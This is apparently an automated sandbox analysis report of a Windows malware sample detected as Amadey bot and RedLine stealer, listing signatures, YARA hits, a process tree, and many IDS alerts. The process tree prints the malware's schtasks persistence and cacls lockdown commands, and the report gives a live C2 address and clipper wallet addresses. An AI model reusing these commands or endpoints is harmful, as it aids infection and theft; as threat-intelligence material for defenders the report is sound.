Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 801767
MD5: 3c86571f94ae2a9b196c945890c4d48a
SHA1: 7bb15580dc7270573c9d1f76c78133b6f049c9d4
SHA256: f3d60db1572877967d2c8a48d1a41c40f40ad459b1965eb959494ade84a22ca2
Tags: Amadey, exe

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadey's Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Contains functionality to detect virtual machines (SLDT)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5092 cmdline: C:\Users\user\Desktop\file.exe MD5: 3C86571F94AE2A9B196C945890C4D48A)
    • bmKg.exe (PID: 780 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe MD5: 243D9E7FA50F53508036E1579B603367)
      • aTaf.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe MD5: 7A0C89DA78468AC421B2B1CD1A36DEE9)
      • nika.exe (PID: 2376 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 404 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 920 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5860 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 992 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 1016 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 2904 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 5916 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 1028 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4212 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 4132 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 3292 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5936 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4852 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5668 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4276 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000009.00000000.446489289.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
0000001A.00000002.658498410.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
9.2.mnolyk.exe.d50000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
22.0.mnolyk.exe.d50000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
2.3.aTaf.exe.540000.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
2.3.aTaf.exe.540000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
19.2.mnolyk.exe.d50000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp: 02/08/23-17:38:41.059224
Source IP: 192.168.2.4
Destination IP: 62.204.41.4
SID: 2027700
Source Port: 49959
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected
                            SID:2027700
                            Source Port:50005
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450254802027700 02/08/23-17:40:00.514767
                            SID:2027700
                            Source Port:50254
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450259802027700 02/08/23-17:40:01.724392
                            SID:2027700
                            Source Port:50259
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450000802027700 02/08/23-17:38:56.276223
                            SID:2027700
                            Source Port:50000
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449718802027700 02/08/23-17:37:30.060143
                            SID:2027700
                            Source Port:49718
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449967802027700 02/08/23-17:38:46.093677
                            SID:2027700
                            Source Port:49967
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450295802027700 02/08/23-17:40:10.522022
                            SID:2027700
                            Source Port:50295
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450041802027700 02/08/23-17:39:06.234295
                            SID:2027700
                            Source Port:50041
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450018802027700 02/08/23-17:39:00.633703
                            SID:2027700
                            Source Port:50018
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449713802027700 02/08/23-17:37:28.821552
                            SID:2027700
                            Source Port:49713
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449926802027700 02/08/23-17:38:31.519366
                            SID:2027700
                            Source Port:49926
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450148802027700 02/08/23-17:39:32.593659
                            SID:2027700
                            Source Port:50148
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449754802027700 02/08/23-17:37:41.168561
                            SID:2027700
                            Source Port:49754
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449962802027700 02/08/23-17:38:41.870045
                            SID:2027700
                            Source Port:49962
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450290802027700 02/08/23-17:40:09.328461
                            SID:2027700
                            Source Port:50290
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450332802027700 02/08/23-17:40:21.859053
                            SID:2027700
                            Source Port:50332
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450180802027700 02/08/23-17:39:42.064684
                            SID:2027700
                            Source Port:50180
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450082802027700 02/08/23-17:39:16.214186
                            SID:2027700
                            Source Port:50082
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449876802027700 02/08/23-17:38:19.187751
                            SID:2027700
                            Source Port:49876
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449974802027700 02/08/23-17:38:47.760275
                            SID:2027700
                            Source Port:49974
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450171802027700 02/08/23-17:39:38.199718
                            SID:2027700
                            Source Port:50171
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449787802027700 02/08/23-17:37:49.088688
                            SID:2027700
                            Source Port:49787
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449726802027700 02/08/23-17:37:33.198314
                            SID:2027700
                            Source Port:49726
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450152802027700 02/08/23-17:39:33.546078
                            SID:2027700
                            Source Port:50152
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450241802027700 02/08/23-17:39:57.341359
                            SID:2027700
                            Source Port:50241
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450250802027700 02/08/23-17:39:59.546506
                            SID:2027700
                            Source Port:50250
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449717802027700 02/08/23-17:37:29.811373
                            SID:2027700
                            Source Port:49717
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449815802027700 02/08/23-17:37:58.137635
                            SID:2027700
                            Source Port:49815
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450238802027700 02/08/23-17:39:56.593363
                            SID:2027700
                            Source Port:50238
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450149802027700 02/08/23-17:39:32.825800
                            SID:2027700
                            Source Port:50149
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450247802027700 02/08/23-17:39:58.822362
                            SID:2027700
                            Source Port:50247
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450336802027700 02/08/23-17:40:22.842207
                            SID:2027700
                            Source Port:50336
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449816802027700 02/08/23-17:37:58.374846
                            SID:2027700
                            Source Port:49816
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450078802027700 02/08/23-17:39:15.231604
                            SID:2027700
                            Source Port:50078
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450311802027700 02/08/23-17:40:15.296990
                            SID:2027700
                            Source Port:50311
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449905802027700 02/08/23-17:38:26.197219
                            SID:2027700
                            Source Port:49905
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449946802027700 02/08/23-17:38:37.915361
                            SID:2027700
                            Source Port:49946
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449857802027700 02/08/23-17:38:13.235521
                            SID:2027700
                            Source Port:49857
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449983802027700 02/08/23-17:38:50.645662
                            SID:2027700
                            Source Port:49983
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450168802027700 02/08/23-17:39:37.476154
                            SID:2027700
                            Source Port:50168
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449745802027700 02/08/23-17:37:39.033150
                            SID:2027700
                            Source Port:49745
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450222802027700 02/08/23-17:39:52.771625
                            SID:2027700
                            Source Port:50222
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449999802027700 02/08/23-17:38:56.038686
                            SID:2027700
                            Source Port:49999
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450009802027700 02/08/23-17:38:58.446402
                            SID:2027700
                            Source Port:50009
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450275802027700 02/08/23-17:40:05.702720
                            SID:2027700
                            Source Port:50275
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450317802027700 02/08/23-17:40:18.173072
                            SID:2027700
                            Source Port:50317
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450079802027700 02/08/23-17:39:15.474751
                            SID:2027700
                            Source Port:50079
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450151802027700 02/08/23-17:39:33.307816
                            SID:2027700
                            Source Port:50151
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450110802027700 02/08/23-17:39:23.028270
                            SID:2027700
                            Source Port:50110
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450021802027700 02/08/23-17:39:01.371725
                            SID:2027700
                            Source Port:50021
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449927802027700 02/08/23-17:38:32.329981
                            SID:2027700
                            Source Port:49927
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450062802027700 02/08/23-17:39:11.394661
                            SID:2027700
                            Source Port:50062
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449933802027700 02/08/23-17:38:34.763685
                            SID:2027700
                            Source Port:49933
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449872802027700 02/08/23-17:38:18.196909
                            SID:2027700
                            Source Port:49872
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449942802027700 02/08/23-17:38:36.933202
                            SID:2027700
                            Source Port:49942
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449774802027700 02/08/23-17:37:45.979162
                            SID:2027700
                            Source Port:49774
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449844802027700 02/08/23-17:38:08.504141
                            SID:2027700
                            Source Port:49844
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450025802027700 02/08/23-17:39:02.337619
                            SID:2027700
                            Source Port:50025
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449863802027700 02/08/23-17:38:16.006053
                            SID:2027700
                            Source Port:49863
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449961802027700 02/08/23-17:38:41.634574
                            SID:2027700
                            Source Port:49961
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449758802027700 02/08/23-17:37:42.136397
                            SID:2027700
                            Source Port:49758
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450034802027700 02/08/23-17:39:04.545459
                            SID:2027700
                            Source Port:50034
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450196802027700 02/08/23-17:39:46.473903
                            SID:2027700
                            Source Port:50196
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450040802027700 02/08/23-17:39:05.994783
                            SID:2027700
                            Source Port:50040
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450081802027700 02/08/23-17:39:15.969624
                            SID:2027700
                            Source Port:50081
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450288802027700 02/08/23-17:40:08.838915
                            SID:2027700
                            Source Port:50288
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450294802027700 02/08/23-17:40:10.272901
                            SID:2027700
                            Source Port:50294
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450123802027700 02/08/23-17:39:26.512749
                            SID:2027700
                            Source Port:50123
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450279802027700 02/08/23-17:40:06.686450
                            SID:2027700
                            Source Port:50279
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450108802027700 02/08/23-17:39:22.559760
                            SID:2027700
                            Source Port:50108
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450206802027700 02/08/23-17:39:48.861882
                            SID:2027700
                            Source Port:50206
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450308802027700 02/08/23-17:40:13.941053
                            SID:2027700
                            Source Port:50308
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450291802027700 02/08/23-17:40:09.560444
                            SID:2027700
                            Source Port:50291
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449891802027700 02/08/23-17:38:22.836955
                            SID:2027700
                            Source Port:49891
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449761802027700 02/08/23-17:37:42.845742
                            SID:2027700
                            Source Port:49761
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449831802027700 02/08/23-17:38:01.970314
                            SID:2027700
                            Source Port:49831
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449701802027700 02/08/23-17:37:25.852741
                            SID:2027700
                            Source Port:49701
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449885802027700 02/08/23-17:38:21.385215
                            SID:2027700
                            Source Port:49885
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449914802027700 02/08/23-17:38:28.388086
                            SID:2027700
                            Source Port:49914
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449955802027700 02/08/23-17:38:40.070472
                            SID:2027700
                            Source Port:49955
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449996802027700 02/08/23-17:38:55.320994
                            SID:2027700
                            Source Port:49996
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450266802027700 02/08/23-17:40:03.436704
                            SID:2027700
                            Source Port:50266
                            Destination Port:80
                            Protocol:TCP
                            Timestamp:192.168.2.462.204.41.449928802027700 02/08/23-17:38:32.721034
                            SID:2027700
                            Source Port:49928
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449833802027700 02/08/23-17:38:02.749209
                            SID:2027700
                            Source Port:49833
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450100802027700 02/08/23-17:39:20.589445
                            SID:2027700
                            Source Port:50100
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449989802027700 02/08/23-17:38:53.655632
                            SID:2027700
                            Source Port:49989
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449744802027700 02/08/23-17:37:38.778108
                            SID:2027700
                            Source Port:49744
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450144802027700 02/08/23-17:39:31.611275
                            SID:2027700
                            Source Port:50144
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449810802027700 02/08/23-17:37:56.966034
                            SID:2027700
                            Source Port:49810
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449721802027700 02/08/23-17:37:31.055128
                            SID:2027700
                            Source Port:49721
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450233802027700 02/08/23-17:39:55.389175
                            SID:2027700
                            Source Port:50233
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449782802027700 02/08/23-17:37:47.887596
                            SID:2027700
                            Source Port:49782
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450239802027700 02/08/23-17:39:56.854078
                            SID:2027700
                            Source Port:50239
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
